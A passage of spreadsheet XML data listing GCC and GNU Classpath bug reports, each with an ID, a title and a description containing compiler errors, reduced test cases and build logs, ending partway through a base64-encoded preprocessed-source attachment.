with any optimizations enabled (-O -O2 -O3) e.g.:
$ gcc -c tree234.i -O
tree234.c: In function `tree234_module66':
tree234.c:23795: internal compiler error: in flow_loops_find at cfgloop.c:830
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$</t>
  </si>
  <si>
    <t>GCC-5137</t>
  </si>
  <si>
    <t>make proto fails (SYSCALLS.c.X generation broken) since -aux-info is not supported</t>
  </si>
  <si>
    <t>sed -e s/TARGET_GETGROUPS_T/gid_t/ \
  ../../gcc/sys-types.h ../../gcc/sys-protos.h &gt; SYSCALLS.c
./xgcc -B./ -B/usr/i486-suse-linux/bin/ -isystem /usr/i486-suse-linux/include -isystem /usr/i486-suse-linux/sys-include -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isystem ./include     -I. -I. -I../../gcc -I../../gcc/. -I../../gcc/config -I../../gcc/../include \
  -aux-info SYSCALLS.c.X -S -o tmp-SYSCALLS.s SYSCALLS.c
cc1: unrecognized option `-aux-info'
cc1: output filename specified twice
cc1: SYSCALLS.c.X: No such file or directory
make: *** [SYSCALLS.c.X] Error 1
Release:
GCC 3.1 CVS as of 2001-12-17
Environment:
i686-linux-gnu
How-To-Repeat:
Run the following command after make bootstrap:
make -C gcc CC=./xgcc -B ./ -O2 proto</t>
  </si>
  <si>
    <t>GCC-45472</t>
  </si>
  <si>
    <t>[4.7 Regression] [Middle-end volatile semantics] ICE: in move_op_ascend at sel-sched.c:6124 with -fselective-scheduling2</t>
  </si>
  <si>
    <t>Command line:
$ gcc -O1 -fschedule-insns2 -fselective-scheduling2 testcase.c
Compiler output:
$ gcc -O1 -fschedule-insns2 -fselective-scheduling2 testcase.c
testcase.c: In function 'foo':
testcase.c:18:1: internal compiler error: in move_op_ascend at sel-sched.c:6124
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r163636 - crash
r153685 - crash
4.4 r149995 - OK</t>
  </si>
  <si>
    <t>GCC-8120</t>
  </si>
  <si>
    <t>cpp concatenation doesn't work as described</t>
  </si>
  <si>
    <t>cpp.info-&gt; Implementation Details
	-&gt; Obsolete Features
	-&gt; Miscellaneous obsolete features
	-&gt; Attempting to paste two tokens which together do not form
	   a valid preprocessing token.
Says (quoted literally):
The preprocessor currently warns about this and outputs the two
tokens adjacently which is probably the behavior the programmer
intends.  It may not work in future though.
Most of the time when you get this warning you will find that
`##' is being used superstitiously to guard against whitespace
appearing between two tokens.  It is almost always safe to delete
the `##'.
(end quote)
I was using the following code cut down to the bare essentials and
replacing `#include' by `include' in order to (a) get some output from the
preprocessor and (b) make visible what happens.
##################  start of input file bug.c  ####################
#define XXX_H(name) XXX_I(prefix_ ## name ## .h)
#define XXX_I(file) #file
include XXX_H(all)
###################  end of input file bug.c  #####################
The command `gcc -E bug.c -o bug.i' yields
##################  start of output file bug.i  ###################
# 1 bug.c
# 1 
# 1 
# 1 bug.c
include prefix_all .h
###################  end of output file bug.i  ####################
together with the warning:
bug.c:4:18: warning: pasting prefix_all and . does not give a valid
preprocessing token
The warning is in agreement with the above quote but the output is not
since the two tokens `prefix_all' and `.' are separated by a space (and
subsequently stringified).
This construct used to produce prefix_all.h with gcc-2.95.3 (without
warning). With gcc-3.1.1 and 3.2 I got the desired result (with a warning) when
I replaced `name ## .h' by `name ##.h' or by  `name##.h' but not with
`name## .h'. I would think something funny happens here with the handling of
whitespace!!
Of course the second paragraph quoted above applies: `name ## .h' should
be replaced by `name.h' which equally works with gcc-2.95.3 and gcc-3.2
(without any warnings).
Release:
3.2
Environment:
System: Linux pcl321 2.4.17 #1 Sat Feb 23 15:19:54 CET 2002 i686 unknown
Architecture: i686
host: i586-pc-linux-gnu
build: i586-pc-linux-gnu
target: i586-pc-linux-gnu
configured with: ../gcc-3.2/configure --host=ix86-linux-gnulibc2 --prefix=/usr --disable-nls --enable-shared --enable-languages=c++f77objc --bindir=/ix86-linux-gnulibc2/bin
How-To-Repeat:
See above</t>
  </si>
  <si>
    <t>GCC-36684</t>
  </si>
  <si>
    <t>[4.3/4.4 Regression] spill failure for class 'R0_REGS' on sh4 with -fPIC -O2</t>
  </si>
  <si>
    <t>gcc-4.3.0 fails to compile with this message when compiling 
expect-5.43.0. gcc-4.1.3 can compile without fail.
They are both natively running on sh4 board.
           gcc -c  -I. -I. -I/usr/include/tcl-private/generic   -DEXP_VERSION=\5.43.0\ -DSCRIPTDIR=\/usr/share/tcl8.5/expect5.43\ -DEXECSCRIPTDIR=\/usr/lib/tcl8.5/expect5.43\ -DTCL_DEBUGGER -DUSE_NON_CONST -DSTTY_BIN=\/bin/stty\ -O2 -g -mieee -O2 -g -mieee -pipe  -fPIC -DDFLT_STTY=\sane\  Dbg.c -o shared/Dbg.o  \
        fi
Dbg.c: In function 'Dbg_Interactor':
Dbg.c:1071: error: unable to find a register to spill in class 'R0_REGS'
Dbg.c:1071: error: this is the insn:
(insn:HI 31 50 51 4 Dbg.c:1069 (set (mem/f/c/i:SI (plus:SI (reg/f:SI 3 r3 [186])                (reg:SI 12 r12)) [22 interdata+0 S4 A32])
        (reg/v/f:SI 6 r6 [orig:165 data ] [165])) 172 {movsi_ie} (expr_list:REG_DEAD (reg/f:SI 3 r3 [186])
        (expr_list:REG_DEAD (reg/v/f:SI 6 r6 [orig:165 data ] [165])
            (nil))))
Dbg.c:1071: confused by earlier errors bailing out
Preprocessed source stored into /tmp/ccjGJhgH.out file please attach this to your bugreport.
make: *** [Dbg.o] Error 1
# /usr/bin/gcc -v
Using built-in specs.
Target: sh4-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=http://bugzilla.redhat.com/bugzilla --enable-bootstrap --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-languages=cc++objcobj-c++javafortran --enable-java-awt=gtk --disable-dssi --enable-plugin --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-1.5.0.0/jre --enable-libgcj-multifile --enable-java-maintainer-mode --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --disable-libjava-multilib --build=sh4-redhat-linux
Thread model: posix
gcc version 4.3.0 20080404 (Red Hat 4.3.0-6.fs1.1) (GCC)</t>
  </si>
  <si>
    <t>GCC-30888</t>
  </si>
  <si>
    <t>%VAL construct fails with argument procedures</t>
  </si>
  <si>
    <t>When calling procedures which are passed as arguments to
a subroutine the %VAL construct has inconsistent behaviour.
Consider the following code:
      SUBROUTINE VALTEST( DOIT )
      EXTERNAL DOIT
      INTEGER P
      INTEGER I
      I = 0
      P = 0
      CALL DOIT( %VAL( P ) )
      CALL DOIT( I )
      CALL DOIT( %VAL( P ) )
      END
&gt; gfortran -c valtest.f 
valtest.f:9.22:
      CALL DOIT( %VAL( P ) )                                            
                     1
Error: By-value argument at (1) is not allowed in this context
which is an error caused by the second identical call to DOIT(%VAL(P)).</t>
  </si>
  <si>
    <t>GCC-3889</t>
  </si>
  <si>
    <t>parser:Problems with template parameter dependant name</t>
  </si>
  <si>
    <t>The following code:
template
struct S {}
// 1
template::X::x &gt;
class C {}
don't compile. From codesourcery:
GCC Output
These are the results of processing your source code with the following command:
    g++ [input] 
Exit code: 256
Messages:
    /usr/tmp/@28107.7.cc:5: parse error before `::' token
Note that gcc gives the same error with:
template
struct S {}
// 2
template
class C {
  static int const i = S::X::x
}
Release:
3.0 (Debian) (Debian testing/unstable)
Environment:
System: Linux alpha.tchume.net 2.4.4 #2 mar mai 22 08:16:07 CEST 2001 i586 unknown
Architecture: i586
host: i386-pc-linux-gnu
build: i386-pc-linux-gnu
target: i386-pc-linux-gnu
configured with: ../src/configure -v --enable-languages=cc++javaf77protoobjc --prefix=/usr --infodir=/share/info --mandir=/share/man --enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-x --without-included-gettext --disable-checking --enable-threads=posix --enable-java-gc=boehm --with-cpp-install-dir=bin --enable-objc-gc i386-linux</t>
  </si>
  <si>
    <t>GCC-68995</t>
  </si>
  <si>
    <t>[4.9/5/6 Regression] Including both  and  can cause ADL problems in std::function SFINAE</t>
  </si>
  <si>
    <t>Repro adapted from http://stackoverflow.com/q/34334735/2756719:
#include 
#include 
#include  
std::tr1::shared_ptr test() { return {} }
std::function()&gt; func = test
This compiles iff the #include  is commented out. When both  and  are included however we get an error apparently because
template
using _Invoke = decltype(__callable_functor(std::declval())
                         (std::declval()...) )
in std::function does an unqualified call to __callable_functor and picks up both std::__callable_functor in  from normal unqualified lookup and std::tr1::__callable_functor in  from ADL resulting in an ambiguity which in turn causes substitution failure in the converting constructor template.</t>
  </si>
  <si>
    <t>GCC-66788</t>
  </si>
  <si>
    <t>[5 Regression] Rejects instantiation of class std::deque with -m32</t>
  </si>
  <si>
    <t>Created attachment 35922
unincluded testcase
The testcase is rejected with GCC 5 and -std=c++11 -m32 with
In file included from /usr/include/c++/5/x86_64-suse-linux/bits/c++allocator.h:33:0
                 from /usr/include/c++/5/bits/allocator.h:46
                 from /usr/include/c++/5/string:41
                 from /home/abuild/rpmbuild/BUILD/FreeOCL-0.3.6.svn.397/src/freeocl.h:22
                 from /home/abuild/rpmbuild/BUILD/FreeOCL-0.3.6.svn.397/src/freeocl.cpp:18:
/usr/include/c++/5/ext/new_allocator.h: In instantiation of â€˜struct __gnu_cxx::new_allocatorâ€™:
/usr/include/c++/5/bits/allocator.h:92:11:   required from â€˜class std::allocatorâ€™
/usr/include/c++/5/bits/alloc_traits.h:88:43:   required from â€˜struct std::allocator_traits &gt;â€™
/usr/include/c++/5/ext/alloc_traits.h:95:10:   required from â€˜struct __gnu_cxx::__alloc_traits &gt;â€™
/usr/include/c++/5/bits/stl_deque.h:462:21:   required from â€˜class std::_Deque_base &gt;â€™
/usr/include/c++/5/bits/stl_deque.h:829:11:   required from â€˜class std::dequeâ€™
/home/abuild/rpmbuild/BUILD/FreeOCL-0.3.6.svn.397/src/kernel.h:44:43:   required from here
/usr/include/c++/5/ext/new_allocator.h:93:7: error: â€˜const _Tp* __gnu_cxx::new_allocator::address(__gnu_cxx::new_allocator::const_reference) const [with _Tp = long long unsigned int __gnu_cxx::new_allocator::const_pointer = const long long unsigned int* __gnu_cxx::new_allocator::const_reference = const long long unsigned int&amp;]â€™ cannot be overloaded
       address(const_reference __x) const _GLIBCXX_NOEXCEPT
       ^
while it is accepted with GCC 5 and -m64 (or GCC 4.9 and both -m32 and -m64).</t>
  </si>
  <si>
    <t>GCC-24912</t>
  </si>
  <si>
    <t>[4.1/4.2 Regression] m68k build failure: ICE: in reload_cse_simplify_operands</t>
  </si>
  <si>
    <t>m68k-elf build fails building libiberty/regex.c.
Reduced testcase below:
void foo(void)
void
bar (unsigned char *p)
{
  int j
  j = *(p) 
  j += ((signed char) (*p) ) &lt;&lt; 8
  if (j)
    foo()
}
Compiled with m68-elf-gcc -O2 gives
test.c:10: error: insn does not satisfy its constraints:
(insn 40 16 41 0 (set (reg:SI 2 %d2)
        (sign_extend:SI (reg:HI 0 %d0 [34]))) 65 {*68k_extendhisi2} (nil)
    (nil))
test.c:10: internal compiler error: in reload_cse_simplify_operands at postreload.c:393
Appears to have been caused by r106804 (reverting this patch allows the build to succeed):
2005-11-12  Hans-Peter Nilsson  
       PR middle-end/24750
       * reload.c (find_reloads_address_1) &lt;case TRUNCATE SIGN_EXTEND
       ZERO_EXTEND&gt;: New cases.</t>
  </si>
  <si>
    <t>GCC-19363</t>
  </si>
  <si>
    <t>List directed write of Infinity and NaN has regressed</t>
  </si>
  <si>
    <t>program test_list
  real x  y
  x = 0.0
  y = 0.0
  write(**iostat=ier) x /y
  x = 1.0
  write(**iostat=ier) x /y
end program test_list
correctly gave with gfortran 20041010
$ ./a
            NaN
      +Infinity
but now gives for either NaN or Infinity with gfortran 20050108
$ ./a
At line 5 of file /cygdrive/d/gfortran/test_list.f90
Internal Error: printf is broken</t>
  </si>
  <si>
    <t>CLASSPATH-28128</t>
  </si>
  <si>
    <t>Corner case bug with JComboBox / JTextArea / JPanel</t>
  </si>
  <si>
    <t>This is a very corner-case bug just reporting it for the sake of completeness.
If a JComboBox is placed inside a JPanel and the JPanel is placed above a JTextArea and the JTextArea has a set number of rows then the options in the JComboBox's popup menu will not display properly.  Attaching a test case to demonstrate this.</t>
  </si>
  <si>
    <t>GCC-19654</t>
  </si>
  <si>
    <t>compilation crashes when variable is too large instead of showing error</t>
  </si>
  <si>
    <t>GNU Fortran 95 (GCC 4.0.0 20050127 (experimental))
Copyright (C) 2005 Free Software Foundation Inc.
guillem@peret guillem $ gfc kk.f90 -lfftw3f
kk.f90: In function 'MAIN__':
kk.f90:14: internal compiler error: in tree_low_cst at tree.c:3816
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
ifort{
guillem@peret guillem $ ifort -v
Version 8.1
} gives
guillem@peret guillem $ ifort kk.f90 -lfftw3f
fortcom: Error: kk.f90 line 10: A common block or variable may not exceed
2147483647 bytes
  real dimension(NN)    :: output
-----------------------------^
fortcom: Error: kk.f90 line 9: A common block or variable may not exceed
2147483647 bytes
  real dimension(NN)    :: input
-----------------------------^
compilation aborted for kk.f90 (code 1)
program kk
  implicit none
  include /usr/include/fftw3.f
  integer parameter :: N=32768 M=N/2-1
  real dimension(NN)    :: input
  real dimension(NN)    :: output
  integer(8):: plan
  call random_number(input)
  open(12file='fisico')
  open(13file='fourier')
  call sfftw_plan_dft_r2c_2d(planNNinputoutputFFTW_ESTIMATE)
  call sfftw_execute(plan)
  call sfftw_destroy_plan(plan)
end program kk
----------------
Linked with fftw3 but not relevant (I presume)</t>
  </si>
  <si>
    <t>GCC-46838</t>
  </si>
  <si>
    <t>[OOP] Initialization of polymorphic allocatable components</t>
  </si>
  <si>
    <t>Created attachment 22672
test-case
Hello
At r167487 the polymorphic component of an INTENT(OUT) dummy starts as ALLOCATED which is obviously wrong. 
[sfilippo@localhost bug28]$ gfortran -v 
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=/usr/local/gnu46/libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc/configure --prefix=/usr/local/gnu46 --enable-languages=cc++fortran --with-gmp=/home/travel/GCC/BUILDS/gmp --with-mpfr=/home/travel/GCC/BUILDS/mpfr --with-mpc=/home/travel/GCC/BUILDS/mpc : (reconfigured) ../gcc/configure --prefix=/usr/local/gnu46 --enable-languages=cc++fortran --with-gmp=/home/travel/GCC/BUILDS/gmp --with-mpfr=/home/travel/GCC/BUILDS/mpfr --with-mpc=/home/travel/GCC/BUILDS/mpc : (reconfigured) ../gcc/configure --prefix=/usr/local/gnu46 --with-gmp=/home/travel/GCC/BUILDS/gmp --with-mpfr=/home/travel/GCC/BUILDS/mpfr --with-mpc=/home/travel/GCC/BUILDS/mpc --enable-languages=cc++fortranlto --no-create --no-recursion
Thread model: posix
gcc version 4.6.0 20101206 (experimental) (GCC) 
[sfilippo@localhost bug28]$ gfortran -o bug28 bug28.f90
[sfilippo@localhost bug28]$ ./bug28 
Generating Matrix (size=512)...
 Allocated on an intent(OUT) var?</t>
  </si>
  <si>
    <t>GCC-63892</t>
  </si>
  <si>
    <t>[5 Regression] gcc.dg/sibcall-3.c fails on darwin with -m32</t>
  </si>
  <si>
    <t>Created attachment 33986
Assembler generated by the 4.9.2 compiler and trunk
Compiling sibcall-3.c with -O2 -foptimize-sibling-calls -m32 on x86_64-apple-darwin14 leads to runtime abort: on line 76 the test (trackpoint != stackpos) is true.
I attach to this PR the sibcall-3.c source (slightly amended so it prints out the values of the pointers that should be equal) and the assembler generated by the 4.9.2 compiler and trunk both with -O2 -foptimize-sibling-calls -m32.</t>
  </si>
  <si>
    <t>GCC-2402</t>
  </si>
  <si>
    <t>Problem with compile-time sizeof evaluation and templates</t>
  </si>
  <si>
    <t>The following well-formed C++ program
// -- begin tu.cpp --
template
	struct C
	{
		static T returnaT()
		enum { itsSize = sizeof C::returnaT() }
	}
int
main(int argc char* argv[])
{
	long aSize = C::itsSize
	return 0
}
// -- end tu.cpp -
gives the following error on compile (g++ tu.cpp):
tu.cpp: In instantiation of `C':
tu.cpp:13:   instantiated from here
tu.cpp:13: no method `C::returnaT'
Note that (a) there is too a C::returnaT since it's defined
in the previous line and (2) it's not Smalltalk there are no methods
only member functions so the error message text could be improved
to say what it means.
The problem only occurs with templated classes.  The same code using a non-templated class
compiles OK.
There's a large body of standard-compliant code out there that
relies on this sort of construct working.
This code has never worked with any version of GCC so it's not a regression.
Release:
GNU C++ version 3.1 20010326 (experimental) (i686-pc-linux-gnu)
How-To-Repeat:
See description above.</t>
  </si>
  <si>
    <t>GCC-12048</t>
  </si>
  <si>
    <t>[3.4 Regression] unget does not work</t>
  </si>
  <si>
    <t>When I run the binary generated by compiling the source file t.C with gcc 3.4
I get an unexpected result. I believe it should print harriet 85 95 when
run. This is the output when the code is compiled by gcc 3.3. The example is
extracted from the file main2.cc from Chapter12 of the book Accelerated C++:
Practical Programming by Example by Andrew Koenig and Barbara E. Moo.
Environment:
System: Linux kiste 2.4.20-4GB #1 Fri Jul 11 07:33:18 UTC 2003 i686 unknown unknown GNU/Linux
Architecture: i686
SuSE 8.2
glibc 2.3.2	
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-threads=posix --enable-languages=cc++f77objc --enable-__cxa_atexit --enable-libstdcxx-debug
How-To-Repeat:
source code t.C
#include 
#include 
#include 
#include 
#include 
#include 
using std::max
using std::istream
using std::istream_iterator
using std::ostream
using std::cin
using std::cout
using std::istream
template  class Vec {
public:
	typedef T* iterator
	typedef const T* const_iterator
	typedef size_t size_type
	typedef T value_type
	typedef T
	typedef const T
	Vec() { create() }
	explicit Vec(size_type n const T }
	Vec(const Vec }
	Vec
	~Vec() { uncreate() }
	T }
	const T }
	void push_back(const T&amp; t) {
		if (avail == limit)
			grow()
		unchecked_append(t)
	}
	size_type size() const { return avail - data }
	iterator begin() { return data }
	const_iterator begin() const { return data }
	iterator end() { return avail }
	const_iterator end() const { return avail }
	void clear() { uncreate() }
	bool empty() const { return data == avail }
private:
	iterator data	
	iterator avail
	iterator limit
	std::allocator alloc
	void create()
	void create(size_type const T
	void create(const_iterator const_iterator)
	void uncreate()
	void grow()
	void unchecked_append(const T
}
template  void Vec::create()
{
	data = avail = limit = 0
}
template  void Vec::create(size_type n const T&amp; val)
{
	data = alloc.allocate(n)
	limit = avail = data + n
	std::uninitialized_fill(data limit val)
}
template 
void Vec::create(const_iterator i const_iterator j)
{
	data = alloc.allocate(j - i)
	limit = avail = std::uninitialized_copy(i j data)
}
template  void Vec::uncreate()
{
	if (data) {
		iterator it = avail
		while (it != data)
			alloc.destroy(--it)
		alloc.deallocate(data limit - data)
	}
	data = limit = avail = 0
}
template  void Vec::grow()
{
	size_type new_size = max(2 * (limit - data) ptrdiff_t(1))
	iterator new_data = alloc.allocate(new_size)
	iterator new_avail = std::uninitialized_copy(data avail new_data)
	uncreate()
	data = new_data
	avail = new_avail
	limit = data + new_size
}
template  void Vec::unchecked_append(const T&amp; val)
{
	alloc.construct(avail++ val)
}
template 
Vec&amp; Vec::operator=(const Vec&amp; rhs)
{
	if (&amp;rhs != this) {
		uncreate()
		create(rhs.begin() rhs.end())
	}
	return *this
}
class Str {
	friend std::istream
public:
	typedef Vec::size_type size_type
	Str() { }
	Str(size_type n char c): data(n c) { }
	char }
	const char }
	size_type size() const { return data.size() }
private:
	Vec data
}
ostream&amp; operator&lt;&lt;(ostream&amp; os const Str&amp; s)
{
	for (Str::size_type i = 0 i != s.size() ++i)
		os &lt;&lt; s[i]
	return os
}
istream&amp; operator&gt;&gt;(istream&amp; is Str&amp; s)
{
	s.data.clear()
	char c
	while (is.get(c) &amp;&amp; isspace(c))
	if (is) {
		do	s.data.push_back(c)     
		while (is.get(c) 
		if (is)
			is.unget()
	}
	return is
}
struct Student_info {
	Str name
	double midterm final
}
istream&amp; read(istream&amp; is Student_info&amp; s)
{
	is &gt;&gt; s.name &gt;&gt; s.midterm &gt;&gt; s.final
	cout &lt;&lt; s.name &lt;&lt; ' ' &lt;&lt; s.midterm &lt;&lt; ' ' &lt;&lt; s.final
	return is
}
int main()
{
 	Student_info record
 	read(cin record)
}
g++ -v -W -Wall t.C -save-temps 
Reading specs from /usr/local/lib/gcc/i686-pc-linux-gnu/3.4/specs
Configured with: ../gcc/configure --enable-threads=posix --enable-languages=cc++f77objc --enable-__cxa_atexit --enable-libstdcxx-debug
Thread model: posix
gcc version 3.4 20030820 (experimental)
 /usr/local/libexec/gcc/i686-pc-linux-gnu/3.4/cc1plus -E -quiet -v -D_GNU_SOURCE t.C -mtune=pentiumpro -W -Wall -o t.ii
ignoring nonexistent directory NONE/include
ignoring nonexistent directory /usr/local/lib/gcc/i686-pc-linux-gnu/3.4/../../../../i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/lib/gcc/i686-pc-linux-gnu/3.4/../../../../include/c++/3.4
 /usr/local/lib/gcc/i686-pc-linux-gnu/3.4/../../../../include/c++/3.4/i686-pc-linux-gnu
 /usr/local/lib/gcc/i686-pc-linux-gnu/3.4/../../../../include/c++/3.4/backward
 /usr/local/include
 /usr/local/lib/gcc/i686-pc-linux-gnu/3.4/include
 /usr/include
End of search list.
 /usr/local/libexec/gcc/i686-pc-linux-gnu/3.4/cc1plus -fpreprocessed t.ii -quiet -dumpbase t.C -mtune=pentiumpro -auxbase t -W -Wall -version -o t.s
GNU C++ version 3.4 20030820 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 3.4 20030820 (experimental).
GGC heuristics: --param ggc-min-expand=47 --param ggc-min-heapsize=31899
 as -V -Qy -o t.o t.s
GNU assembler version 2.13.90.0.18 (i486-suse-linux) using BFD version 2.13.90.0.18 20030121 (SuSE Linux)
 /usr/local/libexec/gcc/i686-pc-linux-gnu/3.4/collect2 --eh-frame-hdr -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 /usr/lib/crt1.o /usr/lib/crti.o /usr/local/lib/gcc/i686-pc-linux-gnu/3.4/crtbegin.o -L/usr/local/lib/gcc/i686-pc-linux-gnu/3.4 -L/usr/local/lib/gcc/i686-pc-linux-gnu/3.4/../../.. t.o -lstdc++ -lm -lgcc_s -lgcc -lc -lgcc_s -lgcc /usr/local/lib/gcc/i686-pc-linux-gnu/3.4/crtend.o /usr/lib/crtn.o
cat single_grade
harriet 85 95 88 87 93 45 76 99
./a.out &lt; single_grade
harriet -1.99759 4.86587e-270
gcc 3.3
/a.out &lt; single_grade
harriet 85 95
preprocessed source file
Content-Type: APPLICATION/x-bzip2 name=t.ii.bz2
Content-Transfer-Encoding: BASE64
Content-ID: 
Content-Description: t.ii.bz2
Content-Disposition: attachment filename=t.ii.bz2
QlpoOTFBWSZTWf1FMQYBMU//gH//fbT/////v////7////9h8L776qCvusCg
a1tpXya2LdwNQhKt7z4nr3aXbeuu9COkX2bvH3nt976HoX3u+d9PHnvVvG3v
Qzxtnp833d8ze+NOnbHeHXbpd3ur3asAe++933Xp94tj7lMByFO40p7ab7ue
Mr0oGVFBJ0DuYHte+AAAGHzz6tztnpxPR0dNAfLvZ7Oteu7y2+nU7Xj762+T
3AVvqbsAAB6CgAPQ+XXnvjXsyPaHE8mmu91b3e9Dk17zHu8zx67N21bWrO3r
Xgjzo909xVKIq+tO+768ZRdaLj2jt7D7fPtrXd13z3275puG9EvdbzL6976W
8afe0++nM3332lvfRXfbuvu+YGa7j7d9znPu+reW9qxbbXu7vHe+2+z7MHob
tnw11333z7vrfe556y3mj1Ruw77ehElQoemjRKpa+tU0Aau1dAKAuw69AdCh
IdsAKA0KG9h92oBRVKl72dAetHpqmcmZ2LYDKgoAbtbHVSlb7GdvRfT1NDe5
7EgAAFPtgOvVEupao+97itsAoA0Pr0+164172+3t9ng4D1QNOe8SZe9Yw777
i6+u1DQacmtYiqjbpyN93SgFFKusCgUX3XR93SPtDuOPpn3G7NVvnc110Rpg
Aafa9z1InrCqAAvix0PofTZ1R5pWfN3deh6Pd3OZ7t0AXvtbn33ztHth7e18
Xzfdt9bewdSl8dvprTb712N9m7G98Ne723fN9wZJ2qnjZ3Tx3djV6TfQAnvr
vRn3md0d93EHnfeM+jvtvo217Xd87a+xdYfO++e+8l3Dvc9OlYaAZfC1tu2+
3u3mAHXNh9d7GszUmb7nXUXY9PR7YUVbGu7XW021moKkfbqtyuR0jbZvXX1b
3zZ623Tbj2+ub5nrfbT772vtvvtsetUQbHU7u99z3o2u8HHz77yvEeurd6Vr
DUt6ztwXejvaFPFeh15me7tdUhE16656fT3jF77x7d7r33btM7snV9z573ue
96dtu40Y3crq97z1V7C7udBvF3Ym93Brru+mHt32++7Ply9nYbttkvu7tPOd
1qXrfbfG9hO3ZWeXSvuivB0PWk3Fu97XSutelBp6e+cPvabYWb7na77ud7ax
nddaz2HLZ1zbbLObZ599j69h3zrw9r21UPcffe7nFbDdNfe8+9XvObeu+955
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
